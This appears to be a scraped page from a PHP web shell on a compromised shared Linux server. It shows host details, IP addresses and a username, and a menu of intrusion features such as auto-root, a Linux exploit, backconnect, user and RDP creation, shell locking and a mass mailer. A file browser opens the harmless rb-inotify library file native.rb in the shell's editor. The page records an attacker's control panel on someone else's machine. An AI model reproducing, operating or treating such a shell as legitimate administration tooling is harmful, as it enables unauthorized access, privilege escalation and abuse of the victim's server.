Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
rb-inotify /
[ HOME SHELL ]
Name
Size
Permission
Action
native
[ DIR ]
drwxr-xr-x
errors.rb
66
B
-rw-r--r--
event.rb
4.66
KB
-rw-r--r--
native.rb
924
B
-rw-r--r--
notifier.rb
11.01
KB
-rw-r--r--
version.rb
1.18
KB
-rw-r--r--
watcher.rb
2.79
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : native.rb
require 'ffi' module INotify # This module contains the low-level foreign-function interface code # for dealing with the inotify C APIs. # It's an implementation detail, and not meant for users to deal with. # # @private module Native extend FFI::Library ffi_lib FFI::Library::LIBC begin ffi_lib 'inotify' rescue LoadError end # The C struct describing an inotify event. # # @private class Event < FFI::Struct layout( :wd, :int, :mask, :uint32, :cookie, :uint32, :len, :uint32) end attach_function :inotify_init, [], :int attach_function :inotify_add_watch, [:int, :string, :uint32], :int attach_function :inotify_rm_watch, [:int, :uint32], :int attach_function :fpathconf, [:int, :int], :long attach_function :read, [:int, :pointer, :size_t], :ssize_t attach_function :close, [:int], :int end end
Close